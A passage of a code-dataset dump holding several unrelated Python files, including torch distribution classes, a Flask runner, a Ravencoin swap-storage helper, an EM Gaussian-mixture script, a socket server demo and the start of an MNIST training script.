to be provided as input\")\n return sample\n\n\nclass MultivariateNormalDistribution(VectorDistribution): #TODO: Work in progress\n \"\"\"\n Summary\n \"\"\"\n def __init__(self):\n self.required_parameters = {\"loc\", (\"covariance_matrix\", \"precision_matrix\", \"cholesky_factor\")}\n self.optional_parameters = {}\n self.vector_parameters = {\"loc\"}\n self.matrix_parameters = {}\n self.scalar_parameters = {}\n super().__init__()\n\n def _calculate_log_probability(self, x, **parameters):\n \"\"\"\n One line description\n\n Parameters\n ----------\n\n Returns\n -------\n \"\"\"\n if \"covariance_matrix\" in parameters:\n log_prob = torch.distributions.multivariate_normal.MultivariateNormal(loc=parameters[\"loc\"],\n covariance_matrix=parameters[\"covariance_matrix\"]).log_prob(x)\n elif \"precision_matrix\" in parameters:\n log_prob = torch.distributions.multivariate_normal.MultivariateNormal(loc=parameters[\"loc\"],\n precision_matrix=parameters[\"precision_matrix\"]).log_prob(x)\n elif \"cholesky_factor\" in parameters:\n log_prob = torch.distributions.multivariate_normal.MultivariateNormal(loc=parameters[\"loc\"],\n scale_tril=parameters[\"cholesky_factor\"]).log_prob(x)\n else:\n raise ValueError(\"Either covariance_matrix or precision_matrix or\" +\n \"cholesky_factor needs to be provided as input\")\n return log_prob\n\n def _get_sample(self, **parameters):\n \"\"\"\n One line description\n\n Parameters\n ----------\n\n Returns\n -------\n \"\"\"\n if \"covariance_matrix\" in parameters:\n sample = torch.distributions.multivariate_normal.MultivariateNormal(loc=parameters[\"loc\"],\n covariance_matrix=parameters[\"covariance_matrix\"]).rsample()\n elif \"precision_matrix\" in parameters:\n sample = torch.distributions.multivariate_normal.MultivariateNormal(loc=parameters[\"loc\"],\n precision_matrix=parameters[\"precision_matrix\"]).rsample()\n elif \"cholesky_factor\" in parameters:\n sample = torch.distributions.multivariate_normal.MultivariateNormal(loc=parameters[\"loc\"],\n scale_tril=parameters[\"cholesky_factor\"]).rsample()\n else:\n raise ValueError(\"Either covariance_matrix or precision_matrix or\" +\n \"cholesky_factor needs to be provided as input\")\n return sample\n\n\nclass EmpiricalDistribution(ImplicitDistribution): #TODO: It needs to be reworked.\n \"\"\"\n Summary\n \"\"\"\n def __init__(self, batch_size, is_observed):\n self.required_parameters = {\"dataset\"}\n self.optional_parameters = {\"indices\", \"weights\"}\n self.batch_size = batch_size\n self.is_observed = is_observed\n super().__init__()\n\n def _get_sample(self, **parameters):\n \"\"\"\n One line description\n\n Parameters\n ----------\n Returns\n -------\n Without replacement\n \"\"\"\n dataset = parameters[\"dataset\"]\n if \"indices\" not in parameters:\n if \"weights\" in parameters:\n weights = parameters[\"weights\"]\n p = np.array(weights).astype(\"float64\")\n p = p/np.sum(p)\n else:\n p = None\n if is_tensor(dataset):\n if self.is_observed:\n dataset_size = dataset.shape[1]\n else:\n dataset_size = dataset.shape[2]\n else:\n dataset_size = len(dataset)\n if dataset_size < self.batch_size:\n raise ValueError(\"It is impossible to have more samples than the size of the dataset without replacement\")\n if is_discrete(dataset): #\n indices = np.random.choice(range(dataset_size), size=self.batch_size, replace=False, p=p)\n else:\n number_samples = dataset.shape[0]\n indices = [np.random.choice(range(dataset_size), size=self.batch_size, replace=False, p=p)\n for _ in range(number_samples)]\n 
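# explicit indices were supplied by the caller, so skip the random draw\n        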
else:\n indices = parameters[\"indices\"]\n\n if is_tensor(dataset):\n if isinstance(indices, list) and isinstance(indices[0], np.ndarray):\n if self.is_observed:\n sample = torch.cat([dataset[n, k, :].unsqueeze(dim=0) for n, k in enumerate(indices)], dim=0)\n else:\n sample = torch.cat([dataset[n, :, k, :].unsqueeze(dim=0) for n, k in enumerate(indices)], dim=0)\n\n elif isinstance(indices, list) and isinstance(indices[0], (int, np.int32, np.int64)):\n if self.is_observed:\n sample = dataset[:, indices, :]\n else:\n sample = dataset[:, :, indices, :]\n else:\n raise IndexError(\"The indices of an empirical variable should be either a list of integers or a list of arrays\")\n else:\n sample = list(np.array(dataset)[indices])\n return sample\n\n\nclass NormalDistribution(ContinuousDistribution, UnivariateDistribution):\n \"\"\"\n Summary\n \"\"\"\n def __init__(self):\n self.required_parameters = {\"loc\", \"scale\"}\n self.optional_parameters = {}\n super().__init__()\n\n def _calculate_log_probability(self, x, **parameters):\n \"\"\"\n One line description\n\n Parameters\n ----------\n\n Returns\n -------\n \"\"\"\n log_prob = distributions.normal.Normal(loc=parameters[\"loc\"],\n scale=parameters[\"scale\"]).log_prob(x)\n return log_prob\n\n def _get_sample(self, **parameters):\n \"\"\"\n One line description\n\n Parameters\n ----------\n\n Returns\n -------\n \"\"\"\n return distributions.normal.Normal(loc=parameters[\"loc\"],\n scale=parameters[\"scale\"]).rsample()\n\n\nclass LogNormalDistribution(ContinuousDistribution, UnivariateDistribution):\n \"\"\"\n Summary\n \"\"\"\n def __init__(self):\n self.required_parameters = {\"loc\", \"scale\"}\n self.optional_parameters = {}\n super().__init__()\n\n def _calculate_log_probability(self, x, **parameters):\n \"\"\"\n One line description\n\n Parameters\n ----------\n\n Returns\n -------\n \"\"\"\n log_prob = distributions.log_normal.LogNormal(loc=parameters[\"loc\"],\n scale=parameters[\"scale\"]).log_prob(x)\n return log_prob\n\n def _get_sample(self, **parameters):\n \"\"\"\n One line description\n\n Parameters\n ----------\n\n Returns\n -------\n \"\"\"\n return distributions.log_normal.LogNormal(loc=parameters[\"loc\"],\n scale=parameters[\"scale\"]).rsample()\n\n\nclass CauchyDistribution(ContinuousDistribution, UnivariateDistribution):\n \"\"\"\n Summary\n \"\"\"\n def __init__(self):\n self.required_parameters = {\"loc\", \"scale\"}\n self.optional_parameters = {}\n super().__init__()\n\n def _calculate_log_probability(self, x, **parameters):\n \"\"\"\n One line description\n\n Parameters\n ----------\n\n Returns\n -------\n \"\"\"\n log_prob = distributions.cauchy.Cauchy(loc=parameters[\"loc\"],\n scale=parameters[\"scale\"]).log_prob(x)\n return log_prob\n\n def _get_sample(self, **parameters):\n \"\"\"\n One line description\n\n Parameters\n ----------\n\n Returns\n -------\n \"\"\"\n return distributions.cauchy.Cauchy(loc=parameters[\"loc\"],\n scale=parameters[\"scale\"]).rsample()\n\n\nclass LaplaceDistribution(ContinuousDistribution, UnivariateDistribution):\n \"\"\"\n Summary\n \"\"\"\n def __init__(self):\n self.required_parameters = {\"loc\", \"scale\"}\n self.optional_parameters = {}\n super().__init__()\n\n def _calculate_log_probability(self, x, **parameters):\n \"\"\"\n One line description\n\n Parameters\n ----------\n\n Returns\n -------\n \"\"\"\n log_prob = distributions.laplace.Laplace(loc=parameters[\"loc\"],\n scale=parameters[\"scale\"]).log_prob(x)\n return log_prob\n\n def _get_sample(self, **parameters):\n 
\"\"\"\n One line description\n\n Parameters\n ----------\n\n Returns\n -------\n \"\"\"\n return distributions.laplace.Laplace(loc=parameters[\"loc\"],\n scale=parameters[\"scale\"]).rsample()\n\n\nclass BetaDistribution(ContinuousDistribution, UnivariateDistribution):\n \"\"\"\n Summary\n \"\"\"\n def __init__(self):\n self.required_parameters = {\"alpha\", \"beta\"}\n self.optional_parameters = {}\n super().__init__()\n\n def _calculate_log_probability(self, x, **parameters):\n \"\"\"\n One line description\n\n Parameters\n ----------\n\n Returns\n -------\n \"\"\"\n log_prob = distributions.beta.Beta(concentration0=parameters[\"alpha\"],\n concentration1=parameters[\"beta\"]).log_prob(x)\n return log_prob\n\n def _get_sample(self, **parameters):\n \"\"\"\n One line description\n\n Parameters\n ----------\n\n Returns\n -------\n \"\"\"\n return distributions.beta.Beta(concentration0=parameters[\"alpha\"],\n concentration1=parameters[\"beta\"]).rsample()\n\n\nclass BinomialDistribution(UnivariateDistribution, DiscreteDistribution):\n \"\"\"\n Summary\n \"\"\"\n def __init__(self):\n self.required_parameters = {\"n\", (\"p\", \"logit_p\")}\n self.optional_parameters = {}\n super().__init__()\n\n def _calculate_log_probability(self, x, **parameters):\n \"\"\"\n One line description\n\n Parameters\n ----------\n\n Returns\n -------\n \"\"\"\n if \"p\" in parameters:\n log_prob = distributions.binomial.Binomial(total_count=parameters[\"n\"],\n probs=parameters[\"p\"]).log_prob(x)\n\n elif \"logit_p\" in parameters:\n log_prob = distributions.binomial.Binomial(total_count=parameters[\"n\"],\n logits=parameters[\"logit_p\"]).log_prob(x)\n else:\n raise ValueError(\"Either p or \" +\n \"logit_p needs to be provided as input\")\n return log_prob\n\n def _get_sample(self, **parameters):\n \"\"\"\n One line description\n\n Parameters\n ----------\n\n Returns\n -------\n \"\"\"\n if \"p\" in parameters:\n sample = distributions.binomial.Binomial(total_count=parameters[\"n\"],\n probs=parameters[\"p\"]).sample()\n elif \"logit_p\" in parameters:\n sample = distributions.binomial.Binomial(total_count=parameters[\"n\"],\n logits=parameters[\"logit_p\"]).sample()\n else:\n raise ValueError(\"Either p or \" +\n \"logit_p needs to be provided as input\")\n return sample\n\n","sub_path":"brancher/distributions.py","file_name":"distributions.py","file_ext":"py","file_size_in_byte":19408,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"240925095","text":"# author: Bayu Aditya\nimport os\nfrom flask import Flask, render_template\n\nSTATICS_DIR = os.path.abspath(\"frontend/statics\")\nTEMPLATES_DIR = os.path.abspath(\"frontend/templates\")\n\napp = Flask(__name__, template_folder=TEMPLATES_DIR, static_folder=STATICS_DIR)\n\n# GET homepage /\n@app.route(\"/\")\ndef homepage():\n return render_template(\"index.html\")\n\nif __name__ == \"__main__\":\n app.run(host='0.0.0.0', port=5000)\n","sub_path":"app-runner.py","file_name":"app-runner.py","file_ext":"py","file_size_in_byte":417,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"317370434","text":"from jsonrpcclient.requests import Request\r\nfrom requests import post, get\r\nfrom decimal import *\r\n\r\nfrom PyQt5.QtCore import *\r\nfrom PyQt5.QtGui import *\r\nfrom PyQt5.QtWidgets import *\r\nfrom PyQt5 import uic\r\n\r\nimport sys, getopt, argparse, json, time, getpass, os.path\r\nfrom util import *\r\nfrom rvn_rpc import *\r\nfrom config import 
*\r\n\r\nfrom swap_transaction import SwapTransaction\r\n\r\nclass SwapStorage:\r\n def __init__ (self):\r\n super()\r\n self.swaps = []\r\n self.locks = []\r\n \r\n def load_swaps(self):\r\n if not os.path.isfile(SWAP_STORAGE_PATH):\r\n return []\r\n fSwap = open(SWAP_STORAGE_PATH, mode=\"r\")\r\n swapJson = fSwap.read()\r\n fSwap.close()\r\n self.swaps = json.loads(swapJson, object_hook=SwapTransaction)\r\n print(\"Loaded {} swaps from disk\".format(len(self.swaps)))\r\n return self.swaps\r\n\r\n def save_swaps(self):\r\n swapJson = json.dumps(self.swaps, default=lambda o: o.__dict__, indent=2)\r\n fSwap = open(SWAP_STORAGE_PATH, mode=\"w\")\r\n fSwap.truncate()\r\n fSwap.write(swapJson)\r\n fSwap.flush()\r\n fSwap.close()\r\n \r\n def load_locked(self):\r\n if not os.path.isfile(LOCK_STORAGE_PATH):\r\n return []\r\n fLock = open(LOCK_STORAGE_PATH, mode=\"r\")\r\n lockJson = fLock.read()\r\n fLock.close()\r\n self.locks = json.loads(lockJson)\r\n print(\"Loaded {} locks from disk\".format(len(self.locks)))\r\n return self.locks\r\n\r\n def save_locked(self):\r\n lockJson = json.dumps(self.locks, default=lambda o: o.__dict__, indent=2)\r\n fLock = open(LOCK_STORAGE_PATH, mode=\"w\")\r\n fLock.truncate()\r\n fLock.write(lockJson)\r\n fLock.flush()\r\n fLock.close()\r\n\r\n def add_swap(self, swap):\r\n self.swaps.append(swap)\r\n utxo_parts = swap.utxo.split(\"|\")\r\n self.add_lock(utxo_parts[0], int(utxo_parts[1]))\r\n\r\n def add_lock(self, txid, vout):\r\n for lock in self.locks:\r\n if txid == lock[\"txid\"] and vout == lock[\"vout\"]:\r\n return #Already added\r\n print(\"Locking UTXO {}|{}\".format(txid, vout))\r\n for utxo in self.utxos:\r\n if txid == utxo[\"txid\"] and vout == utxo[\"vout\"]:\r\n self.locks.append({\"txid\": txid, \"vout\": vout, \"type\": \"rvn\", \"amount\": utxo[\"amount\"]})\r\n return #Locking ravencoin\r\n for asset in self.my_asset_names:\r\n for a_utxo in self.assets[asset][\"outpoints\"]:\r\n if txid == a_utxo[\"txid\"] and vout == a_utxo[\"vout\"]:\r\n self.locks.append({\"txid\": txid, \"vout\": vout, \"type\": \"asset\", \"asset\": asset, \"amount\": a_utxo[\"amount\"]})\r\n return #Locking assets\r\n\r\n def refresh_locks(self):\r\n for swap in self.swaps:\r\n if swap.state == \"new\":\r\n utxo_parts = swap.utxo.split(\"|\")\r\n self.add_lock(utxo_parts[0], int(utxo_parts[1]))\r\n\r\n def load_utxos(self):\r\n #Locked UTXO's are excluded from the list command\r\n self.utxos = do_rpc(\"listunspent\")\r\n \r\n #Pull list of assets for selecting\r\n self.assets = do_rpc(\"listmyassets\", asset=\"\", verbose=True)\r\n self.my_asset_names = [*self.assets.keys()]\r\n\r\n total_balance = 0\r\n for utxo in self.utxos:\r\n total_balance += utxo[\"amount\"]\r\n self.balance = total_balance\r\n\r\n def find_utxo(self, type, quantity, name=None, exact=True, skip_locks=False):\r\n #print(\"Find UTXO: {} Exact: {} Skip Locks: {}\".format(quantity, exact, skip_locks))\r\n if type == \"rvn\":\r\n for rvn_utxo in self.utxos:\r\n if(self.is_taken(rvn_utxo, skip_locks)):\r\n continue\r\n if(float(rvn_utxo[\"amount\"]) == float(quantity) and exact) or (rvn_utxo[\"amount\"] >= quantity and not exact):\r\n return rvn_utxo\r\n elif type == \"asset\":\r\n matching_asset = self.assets[name]\r\n if(matching_asset):\r\n if(matching_asset[\"balance\"] < quantity):\r\n return None\r\n for asset_utxo in matching_asset[\"outpoints\"]:\r\n if(self.is_taken(asset_utxo, skip_locks)):\r\n continue\r\n if(float(asset_utxo[\"amount\"]) == float(quantity) and exact) or 
(asset_utxo[\"amount\"] >= quantity and not exact):\r\n return asset_utxo\r\n return None\r\n\r\n #check if a swap's utxo is still unspent\r\n #if not then the swap has been executed!\r\n def swap_utxo_unspent(self, utxo):\r\n utxo_parts = utxo.split(\"|\")\r\n for utxo in self.utxos:\r\n if utxo[\"txid\"] == utxo_parts[0] and utxo[\"vout\"] == int(utxo_parts[1]):\r\n return True\r\n for asset_name in self.my_asset_names:\r\n for a_utxo in self.assets[asset_name][\"outpoints\"]:\r\n if a_utxo[\"txid\"] == utxo_parts[0] and a_utxo[\"vout\"] == int(utxo_parts[1]):\r\n return True\r\n return False\r\n\r\n def wallet_lock_all_swaps(self):\r\n #first unlock everything\r\n self.wallet_unlock_all()\r\n #now build all orders and send it in one go\r\n locked_utxos = []\r\n for swap in self.swaps:\r\n if swap.state == \"new\":\r\n utxo_parts = swap.utxo.split(\"|\")\r\n locked_utxos.append({\"txid\":utxo_parts[0],\"vout\":int(utxo_parts[1])})\r\n print(\"Locking {} UTXO's for buy orders\".format(len(locked_utxos)))\r\n do_rpc(\"lockunspent\", unlock=False, transactions=locked_utxos)\r\n \r\n def wallet_lock_single(self, swap):\r\n utxo_parts = swap.utxo.split(\"|\")\r\n lock_utxo = [{\"txid\":utxo_parts[0],\"vout\":int(utxo_parts[1])}]\r\n do_rpc(\"lockunspent\", unlock=False, transactions=lock_utxo)\r\n\r\n def wallet_unlock_all(self):\r\n do_rpc(\"lockunspent\", unlock=True)\r\n\r\n def is_taken(self, utxo, skip_locks=False):\r\n if not skip_locks:\r\n for lock in self.locks:\r\n if lock[\"txid\"] == utxo[\"txid\"] and lock[\"vout\"] == utxo[\"vout\"]:\r\n return True\r\n for swap in self.swaps:\r\n expected = \"{}|{}\".format(utxo[\"txid\"], utxo[\"vout\"])\r\n if swap.utxo == expected:\r\n return True\r\n return False\r\n\r\n def locaked_rvn(self, only_orders=True):\r\n total = 0\r\n if only_orders:\r\n for swap in self.swaps:\r\n if swap.type == \"buy\" and swap.state == \"new\":\r\n total += swap.totalPrice()\r\n else:\r\n for lock in self.locks:\r\n if lock[\"type\"] == \"rvn\":\r\n total += lock[\"amount\"]\r\n return total\r\n\r\n def locaked_assets(self, only_orders=True):\r\n total = 0\r\n if only_orders:\r\n for swap in self.swaps:\r\n if swap.type == \"sell\" and swap.state == \"new\":\r\n total += swap.quantity\r\n else:\r\n for lock in self.locks:\r\n if lock[\"type\"] == \"asset\":\r\n total += lock[\"amount\"]\r\n return total","sub_path":"swap_storage.py","file_name":"swap_storage.py","file_ext":"py","file_size_in_byte":6380,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"449136860","text":"#!/usr/bin/env python\n\n# ---- Import standard modules to the python path.\n\nfrom panoptes_client import *\nimport re, operator\n\n#This function generically flatten a dict\ndef flatten(d, parent_key='', sep='_'):\n items = []\n for k, v in d.items():\n new_key = parent_key + sep + k if parent_key else k\n try:\n items.extend(flatten(v, new_key, sep=sep).items())\n except:\n items.append((new_key, v))\n return dict(items)\n\ndef getGoldenSubjectSets(ProjectID):\n # now determine infrastructure of workflows so we know what workflow this image belongs in\n workflowGoldenSetDict = {}\n tmp = Project.find(ProjectID)\n project_flat = flatten(tmp.raw)\n order = project_flat['configuration_workflow_order']\n # Determine workflow order\n workflows = [int(str(iWorkflow)) for iWorkflow in order]\n # Determine subject sets and answers\n for iWorkflow in workflows:\n tmp1 = Workflow.find(iWorkflow)\n tmp1 = flatten(tmp1.raw)\n try:\n 
workflowGoldenSetDict[iWorkflow] = tmp1['configuration_gold_standard_sets']\n except:\n workflowGoldenSetDict[iWorkflow] = []\n\n return workflowGoldenSetDict\n\ndef getGoldenImages(workflowGoldenSetDict):\n workflowGoldenSetImagesDict = {}\n\n for iWorkflow in workflowGoldenSetDict.keys():\n goldenImages = {}\n\n for iGoldenSubjectSet in workflowGoldenSetDict[iWorkflow]:\n tmp = SubjectSet.find(iGoldenSubjectSet)\n tmpSubjects = tmp.subjects()\n\n while True:\n try:\n nextSubject = tmpSubjects.next()\n goldenImages[str(nextSubject.id)] = [str(nextSubject.raw['metadata']['subject_id']), str(nextSubject.raw['metadata']['#Label'])]\n except:\n break\n\n workflowGoldenSetImagesDict[iWorkflow] = goldenImages\n\n return workflowGoldenSetImagesDict\n\ndef getGoldenImagesAsInts(workflowGoldenSetDict):\n from pyomega.API.getLabelDict import getAnswers\n import pandas as pd\n\n answers = getAnswers('1104')\n answersDictRev = dict(enumerate(sorted(answers[2360].keys())))\n answersDict = dict((str(v),k) for k,v in answersDictRev.iteritems())\n\n goldenImagesList = []\n\n for iWorkflow in sorted(workflowGoldenSetDict.keys()):\n\n if not workflowGoldenSetDict[iWorkflow]:\n continue\n\n for iGoldenSubjectSet in workflowGoldenSetDict[iWorkflow]:\n\n tmp = SubjectSet.find(iGoldenSubjectSet)\n tmpSubjects = tmp.subjects()\n\n while True:\n try:\n nextSubject = tmpSubjects.next()\n goldenImagesList.append([int(nextSubject.id), answersDict[str(nextSubject.raw['metadata']['#Label']).upper().translate(None,'() ')],nextSubject.raw['metadata']['subject_id']])\n except:\n break\n\n return pd.DataFrame(goldenImagesList,columns=['links_subjects', 'GoldLabel', 'uniqueID'])\n\n","sub_path":"pyomega/API/getGoldenImages.py","file_name":"getGoldenImages.py","file_ext":"py","file_size_in_byte":2981,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"291379963","text":"import random\nimport math \nimport matplotlib.pyplot as plt\n\ndef estimation(mean,var,prior,llist):\n\n\tpg0x=[]\n\tpg1x=[]\n\tpg2x=[]\n\tll=[]\n\tll0=ll1=ll2=0\n\tfor xi in llist:\n\n\t\tpxg0= (math.exp(-(((xi-mean[0])*(xi-mean[0]))/2/var[0]/var[0])))/math.sqrt(2*3.14156)/var[0]\n\t\tpxg1= (math.exp(-(((xi-mean[1])*(xi-mean[1]))/2/var[1]/var[1])))/math.sqrt(2*3.14156)/var[1]\n\t\tpxg2= (math.exp(-(((xi-mean[2])*(xi-mean[2]))/2/var[2]/var[2])))/math.sqrt(2*3.14156)/var[2]\n\n\n\t\tll0 = ll0 + pxg0\n\t\tll1 = ll1 + pxg1\n\t\tll2 = ll2 + pxg2\n\n\t\tnumerator = pxg0 * prior[0]\n\t\tdenominator = pxg0 * prior[0] + pxg1 * prior[1] + pxg2 * prior[2] \n\t\tpg0x.append(numerator/denominator)\n\n\t\tnumerator = pxg1 * prior[1]\n\t\tpg1x.append(numerator/denominator)\n\n\t\tnumerator = pxg2 * prior[2]\n\t\tpg2x.append(numerator/denominator)\n\n\tll.append(ll0)\n\tll.append(ll1)\n\tll.append(ll2)\n\treturn pg0x,pg1x,pg2x,ll\n\n\n\ndef maximization(g0,g1,g2,nlist):\n\n\tn0=n1=n2=0.0\n\tnume0=nume1=nume2=0\n\tnume00=nume11=nume22=0\n\tm=[]\n\tv=[]\n\tp=[]\n\n\tfor i0 in g0:\n\t\tn0 = n0 + i0\n\tfor i1 in g1:\n\t\tn1 = n1 + i1\n\tfor i2 in g2:\n\t\tn2 = n2 + i2\n\n\t'''print('NRWWE\\n')\n\t\t\t\tprint(n1)\n\t\t\t\tprint('\\n')'''\n\tfor a0,b0 in zip(g0,nlist):\n\t\tnume0 = nume0 + a0*b0\n\t\tnume00 = nume00 + a0*b0*b0\n\tfor a1,b1 in zip(g1,nlist):\n\t\tnume1 = nume1 + a1*b1\n\t\tnume11 = nume11 + a1*b1*b1\n\tfor a2,b2 in zip(g2,nlist):\n\t\tnume2 = nume2 + a2*b2\n\t\tnume22 = nume22 + 
a2*b2*b2\t\n\n\ttry:\n\t\tm.append(nume0/n0)\n\t\tm.append(nume1/n1)\n\t\tm.append(nume2/n2)\n\n\t\tv.append(math.sqrt((nume00/n0)-(m[0]*m[0])))\n\t\tv.append(math.sqrt((nume11/n1)-(m[1]*m[1])))\n\t\tv.append(math.sqrt((nume22/n2)-(m[2]*m[2])))\n\n\t\tp.append(n0/(n0+n1+n2))\n\t\tp.append(n1/(n0+n1+n2))\n\t\tp.append(n2/(n0+n1+n2))\n\texcept:\n\t\tprint('division by zero')\n\n\n\treturn m,v,p\n\n\ndef main():\n\ttext_file = open(\"data1.txt\",\"r\")\n\tinputValues = text_file.read().split('\\n')\n\ttext_file.close()\n\tnew_list=[]\n\tfor i in inputValues:\n\t\tif(i!=''):\n\t\t\tnew_list.append(float(i))\n\n\t#print(new_list)\n\tmean=[]\n\tvar=[]\n\t#mean.append(random.random())\n\tmean.append(random.randint(-30,100))\n\tvar.append(1002)\n\n\t#mean.append(random.random())\n\tmean.append(random.randint(-30,60))\n\tvar.append(5005)\n\n\t#mean.append(random.random())\n\tmean.append(random.randint(-70,150))\n\tvar.append(9009)\n\n\tprior = [.33,.33,.34]\n\n\titeration = 0\n\tlogLikelihood=0\n\ttemp = logLikelihood\n\tdell=1\n\tllhood=[]\n\t\n\tpit=[]\t\t\t\n\twhile True:\n\t\tif(dell < .001):\n\t\t\tbreak\n\t\telse:\n\t\t\tg0,g1,g2,ll = estimation(mean,var,prior,new_list)\n\t\t\tlogLikelihood = math.log(prior[0]*ll[0]+prior[1]*ll[1]+prior[2]*ll[2])\n\t\t\tmean,var,prior = maximization(g0,g1,g2,new_list)\n\t\t\t\n\t\t\t#print(logLikelihood)\n\t\t\tllhood.append(logLikelihood)\n\t\t\tpit.append(iteration)\n\t\t\titeration = iteration + 1\n\t\t\tdell = abs(logLikelihood - temp)\n\t\t\ttemp = logLikelihood\n\t\t\t\n\t\n\tplt.plot(pit,llhood)\n\tplt.ylabel('Log Likelihood')\n\tplt.xlabel('Training Time')\n\tplt.show()\nmain()\n\n","sub_path":"EM_algo_simple_version.py","file_name":"EM_algo_simple_version.py","file_ext":"py","file_size_in_byte":2820,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"67821659","text":"from Order import Order\nfrom Truck import Truck\nfrom Action import Action\nfrom Plan import Plan\nfrom PlanLEM import PlanLEM\nfrom Storage import Storage\nfrom typing import List\nimport numpy as np\n\n\nclass ApproachFirst:\n\n @staticmethod\n def getBestOrder(trunk: Truck, orders: List[Order]):\n orders_values = np.array([(order.value() - order.cost() + trunk.costToOrderStart(order)) for order in orders])\n best_value = np.argmax(orders_values)\n return orders[best_value]\n\n\nclass ApproachSecond:\n\n @staticmethod\n def getBestPlan(trunk: Truck, orders: List[Order]):\n actions = []\n for order in orders:\n action = Action(order)\n order.setAction(action)\n actions.append(action)\n\n plan_1 = Plan(len(actions), actions)\n plan_2 = Plan(len(actions), actions)\n plan_3 = Plan(len(actions), actions)\n\n best_plan = Plan.getBestOfPlans(plan_1, plan_2, plan_3)\n\n trunk.setPlan(best_plan)\n return best_plan\n\n\nclass ApproachThird:\n\n @staticmethod\n def getBestPlan(trunk: Truck, orders: List[Order]):\n actions = []\n storage = []\n for order in orders:\n action = Action(order)\n order.setAction(action)\n storage_temp = Storage(action)\n actions.append(action)\n storage.append(storage_temp)\n\n plan_1 = PlanLEM(len(storage), trunk, storage)\n plan_2 = PlanLEM(len(storage), trunk, storage)\n plan_3 = PlanLEM(len(storage), trunk, storage)\n\n best_plan = PlanLEM.getBestOfPlans(plan_1, plan_2, plan_3)\n return best_plan\n","sub_path":"Assistant.py","file_name":"Assistant.py","file_ext":"py","file_size_in_byte":1626,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} 
+{"seq_id":"212244862","text":"import os\nimport socket\nimport threading\nimport SocketServer\nimport codecs\ndef client(ip,port,message):\n sock=socket.socket(socket.AF_INET,socket.SOCK_STREAM)\n sock.connect((ip,port))\n try:\n sock.sendall(message.encode(\"utf-8\"))\n response=sock.recv(1024)\n print(\"Client received:%s\"%response.decode(\"utf-8\"))\n finally:\n sock.close()\n\nclass ThreadedTCPRequestHandler(SocketServer.BaseRequestHandler):\n def handle(self):\n data=self.request.recv(1024)\n current_thread=threading.current_thread()\n response=\"%s: %s\"%(current_thread,data)\n self.request.sendall(response)\n\nclass ThreadedTCPServer(SocketServer.ThreadingMixIn,SocketServer.TCPServer):\n pass\n\nif __name__=='__main__':\n server=ThreadedTCPServer((socket.gethostname(),8080),ThreadedTCPRequestHandler)\n ip,port=server.server_address\n server_thread=threading.Thread(target=server.serve_forever)\n server_thread.daemon=True\n server_thread.start()\n print(\"Server loop running on thread: \",server_thread.name)\n client(ip,port,\"Hello from client 1\")\n client(ip,port,\"Hello from client 2\")\n client(ip,port,\"Hello from client 3\")\n server.shutdown()","sub_path":"pytest/Threading.py","file_name":"Threading.py","file_ext":"py","file_size_in_byte":1134,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"415686038","text":"import sys\nfrom workflow import Workflow\n\ndef main(wf):\n\n items = [\n {\n 'title': 'Doc',\n 'arg': 'docs',\n 'icon': 'doc.png'\n },\n {\n 'title': 'Sheet',\n 'arg': 'sheets',\n 'icon': 'sheet.png'\n },\n {\n 'title': 'Slide',\n 'arg': 'slides',\n 'icon': 'slide.png'\n },\n {\n 'title': 'Form',\n 'arg': 'forms',\n 'icon': 'form.png'\n },\n {\n 'title': 'Drawing',\n 'arg': 'drawings',\n 'icon': 'drawing.png'\n },\n ]\n\n for item in items:\n wf.add_item(title=item['title'],\n subtitle='Create New Google {}'.format(item['title']),\n autocomplete=item['title'],\n arg=item['arg'],\n valid=True,\n icon='icons/{}'.format(item['icon']))\n\n wf.send_feedback()\n\n\nif __name__ == u\"__main__\":\n wf = Workflow()\n sys.exit(wf.run(main))\n\n","sub_path":"drive_create.py","file_name":"drive_create.py","file_ext":"py","file_size_in_byte":1051,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"559775342","text":"from __future__ import print_function\n\nfrom tensorflow.examples.tutorials.mnist import input_data\nprint(\"downloading mnist data...\")\nmnist = input_data.read_data_sets(\n \"mnist/input_data\", source_url=\"http://yann.lecun.com/exdb/mnist/\", one_hot=True)\n\nimport tensorflow as tf\nfrom model import SecurityGradePredictor\nfrom time import strftime\nimport data as dat\nimport os\n\nEPOCH_SIZE = 5000\nHIDDEN_SIZE = 200\nNUM_LAYERS = 5\nBATCH_SIZE = 100\nW_SIZE = NUM_LAYERS\nMAX_STEP = 28\nFEAT_SIZE = 28\nNUM_CLASSES = 10\nLEARNING_RATE = 1e-4\nLOG_DIR = 'logdir'\n\nif __name__ == '__main__':\n if tf.io.gfile.exists(LOG_DIR):\n tf.io.gfile.rmtree(LOG_DIR)\n tf.io.gfile.makedirs(LOG_DIR)\n\n data = tf.compat.v1.placeholder(tf.float32, [None, MAX_STEP, FEAT_SIZE])\n target = tf.compat.v1.placeholder(tf.float32, [None, NUM_CLASSES])\n training = tf.compat.v1.placeholder(tf.bool)\n model = SecurityGradePredictor(\n data, target, W_SIZE, training, num_hidden=HIDDEN_SIZE, num_layers=NUM_LAYERS, learning_rate=LEARNING_RATE)\n saver = tf.compat.v1.train.Saver()\n with tf.compat.v1.Session() as sess:\n summary_writer = tf.compat.v1.summary.FileWriter(LOG_DIR, 
